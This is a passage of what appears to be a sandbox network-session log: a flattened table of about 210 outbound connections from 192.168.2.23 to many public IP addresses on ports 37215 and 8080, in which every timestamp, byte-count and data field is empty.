                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26016192.168.2.2337802157.9.75.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26017192.168.2.2341108192.157.242.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26018192.168.2.2337490157.209.211.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26019192.168.2.235129894.165.33.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26020192.168.2.234682641.108.131.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26021192.168.2.2345368157.149.42.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26022192.168.2.2359740157.237.77.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26023192.168.2.234831241.1.146.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26024192.168.2.234870491.202.94.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26025192.168.2.2332952157.166.218.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26026192.168.2.2359142196.190.231.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26027192.168.2.234474641.225.181.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26028192.168.2.233466049.36.221.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26029192.168.2.2333238157.163.243.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26030192.168.2.2337070197.29.199.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26031192.168.2.2342306197.54.44.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26032192.168.2.233650841.251.56.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26033192.168.2.234930441.144.47.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26034192.168.2.2354602157.244.85.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26035192.168.2.234274241.82.56.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26036192.168.2.234647091.88.162.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26037192.168.2.2359484202.224.143.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26038192.168.2.233586466.3.111.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26039192.168.2.234647041.164.27.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26040192.168.2.233421841.120.81.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26041192.168.2.2351034197.37.127.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26042192.168.2.2345130157.173.97.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26043192.168.2.233800044.129.11.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26044192.168.2.2338952197.212.29.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26045192.168.2.234348641.195.116.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26046192.168.2.2347204157.41.42.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26047192.168.2.2346600197.214.230.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26048192.168.2.2352874176.224.255.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26049192.168.2.233543041.10.107.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26050192.168.2.2353542157.50.53.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26051192.168.2.2334998197.43.138.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26052192.168.2.233858041.165.30.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26053192.168.2.233879097.139.167.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26054192.168.2.2351882167.62.235.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26055192.168.2.2352404132.147.88.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26056192.168.2.2336912197.254.143.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26057192.168.2.234792641.248.22.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26058192.168.2.234812642.240.87.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26059192.168.2.2333172197.137.159.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26060192.168.2.2359564157.205.112.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26061192.168.2.2342096164.19.164.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26062192.168.2.234961041.101.7.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26063192.168.2.2358524176.109.76.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26064192.168.2.235036441.185.97.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26065192.168.2.2349170157.152.104.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26066192.168.2.2347682114.206.22.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26067192.168.2.233355641.172.140.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26068192.168.2.2349438197.210.207.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26069192.168.2.2345284197.211.213.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26070192.168.2.2341180157.8.57.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26071192.168.2.233813441.102.64.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26072192.168.2.2358954197.55.138.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26073192.168.2.2352254197.154.43.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26074192.168.2.233568641.178.52.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26075192.168.2.235959096.102.137.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26076192.168.2.233707441.198.141.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26077192.168.2.234185873.63.130.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26078192.168.2.2337124165.107.116.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26079192.168.2.2345346174.62.14.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26080192.168.2.233780482.226.26.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26081192.168.2.233929057.67.187.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26082192.168.2.2347786209.193.7.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26083192.168.2.235803841.215.85.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26084192.168.2.2354004186.211.111.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26085192.168.2.234209478.93.125.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26086192.168.2.2356948145.138.62.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26087192.168.2.233848039.248.73.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26088192.168.2.2334212132.53.47.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26089192.168.2.2335002184.1.147.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26090192.168.2.235722019.138.137.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26091192.168.2.2352460187.136.42.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26092192.168.2.234084073.155.40.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26093192.168.2.234153272.119.81.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26094192.168.2.2340974132.78.113.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26095192.168.2.2334452177.182.135.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26096192.168.2.234747841.11.163.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26097192.168.2.23333422.192.20.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26098192.168.2.234001460.12.181.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26099192.168.2.233569665.75.118.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26100192.168.2.2344942152.171.108.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26101192.168.2.2355378115.181.97.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26102192.168.2.2357722193.211.231.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26103192.168.2.234688880.99.181.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26104192.168.2.233940895.162.72.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26105192.168.2.2352886134.14.230.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26106192.168.2.2346166193.121.255.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26107192.168.2.2344120102.78.230.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26108192.168.2.2343516155.42.182.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26109192.168.2.2339630117.55.89.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26110192.168.2.234530468.121.132.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26111192.168.2.2354512191.127.196.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26112192.168.2.233990634.59.200.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26113192.168.2.2341752126.176.218.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26114192.168.2.2347628154.246.62.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26115192.168.2.2360022198.114.192.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26116192.168.2.2359718176.45.151.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26117192.168.2.2351404109.29.4.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26118192.168.2.2335274142.137.230.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26119192.168.2.234325893.70.49.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26120192.168.2.234689289.173.109.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26121192.168.2.2355066121.179.152.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26122192.168.2.2358026163.247.120.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26123192.168.2.2334966213.4.124.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26124192.168.2.233392453.194.22.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26125192.168.2.2354230143.12.141.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26126192.168.2.23455225.178.166.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26127192.168.2.2359564171.241.37.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26128192.168.2.2360946102.78.149.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26129192.168.2.234441060.77.63.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26130192.168.2.235318689.112.248.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26131192.168.2.233654047.13.141.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26132192.168.2.2341068220.71.251.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26133192.168.2.2352690216.135.144.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26134192.168.2.233481070.228.81.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26135192.168.2.2337958203.79.153.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26136192.168.2.2360366167.113.131.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26137192.168.2.2340960197.23.93.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26138192.168.2.233622464.131.90.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26139192.168.2.2355534222.220.148.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26140192.168.2.2346822190.7.192.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26141192.168.2.2336496181.11.3.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26142192.168.2.2352510149.213.83.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26143192.168.2.235499832.54.25.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26144192.168.2.2355114131.130.147.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26145192.168.2.2359980118.219.203.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26146192.168.2.2350498159.11.84.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26147192.168.2.2336148117.181.246.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26148192.168.2.235957062.147.205.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26149192.168.2.2351522114.117.114.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26150192.168.2.2358966201.198.94.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26151192.168.2.233960840.214.187.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26152192.168.2.235375051.108.49.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26153192.168.2.2356848124.176.247.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26154192.168.2.2358456103.220.24.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26155192.168.2.2346308116.105.51.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26156192.168.2.233575488.121.102.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26157192.168.2.2346098213.141.33.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26158192.168.2.2342396202.85.130.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26159192.168.2.2357344128.212.89.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26160192.168.2.234429494.83.19.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26161192.168.2.2348868102.47.112.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26162192.168.2.2336706107.36.38.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26163192.168.2.2357824161.143.51.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26164192.168.2.235571280.28.183.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26165192.168.2.234338050.24.155.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26166192.168.2.23430909.69.189.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26167192.168.2.235655896.10.111.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26168192.168.2.2352592208.54.201.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26169192.168.2.234974672.207.145.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26170192.168.2.2347368102.15.71.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26171192.168.2.2347054216.218.73.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26172192.168.2.2354946117.32.10.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26173192.168.2.2360836114.52.157.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26174192.168.2.2344062105.3.159.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26175192.168.2.2334986133.144.241.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26176192.168.2.2355616156.255.120.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26177192.168.2.2355258199.81.99.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26178192.168.2.233990038.104.94.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26179192.168.2.2352748135.132.197.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26180192.168.2.2336618179.74.121.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26181192.168.2.2341534204.73.216.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26182192.168.2.2344554162.252.145.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26183192.168.2.2345892156.234.130.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26184192.168.2.235866019.101.162.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26185192.168.2.233955889.177.222.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26186192.168.2.234907240.180.205.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26187192.168.2.2346396182.5.5.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26188192.168.2.2350246130.117.160.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26189192.168.2.2336974191.216.25.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26190192.168.2.2355804211.34.65.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26191192.168.2.2340930135.3.88.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26192192.168.2.234854637.232.174.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26193192.168.2.234166234.45.113.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26194192.168.2.2356344159.205.179.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26195192.168.2.2340438151.29.185.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26196192.168.2.234317877.245.124.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26197192.168.2.2339458102.108.238.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26198192.168.2.2336694114.20.31.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26199192.168.2.2349694205.232.219.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26200192.168.2.2339226176.50.140.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26201192.168.2.235457636.8.244.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26202192.168.2.233730072.164.12.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26203192.168.2.234827447.75.85.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26204192.168.2.2356280180.1.184.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26205192.168.2.234864686.117.209.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26206192.168.2.2338418125.118.5.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26207192.168.2.2343512178.77.196.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26208192.168.2.2339832190.182.226.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26209192.168.2.2341302179.152.21.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26210192.168.2.2355504101.104.85.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26211192.168.2.235200676.106.224.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26212192.168.2.2350692177.176.193.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26213192.168.2.2333094158.103.37.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26214192.168.2.2350646116.94.161.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26215192.168.2.235096648.112.198.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26216192.168.2.23583165.111.110.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26217192.168.2.235909895.123.159.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26218192.168.2.233782417.63.88.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26219192.168.2.235103844.135.4.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26220192.168.2.2355580195.146.30.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26221192.168.2.234006659.188.23.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26222192.168.2.234933432.190.234.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26223192.168.2.234747698.198.189.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26224192.168.2.2338682148.77.68.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26225192.168.2.2351624206.128.215.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
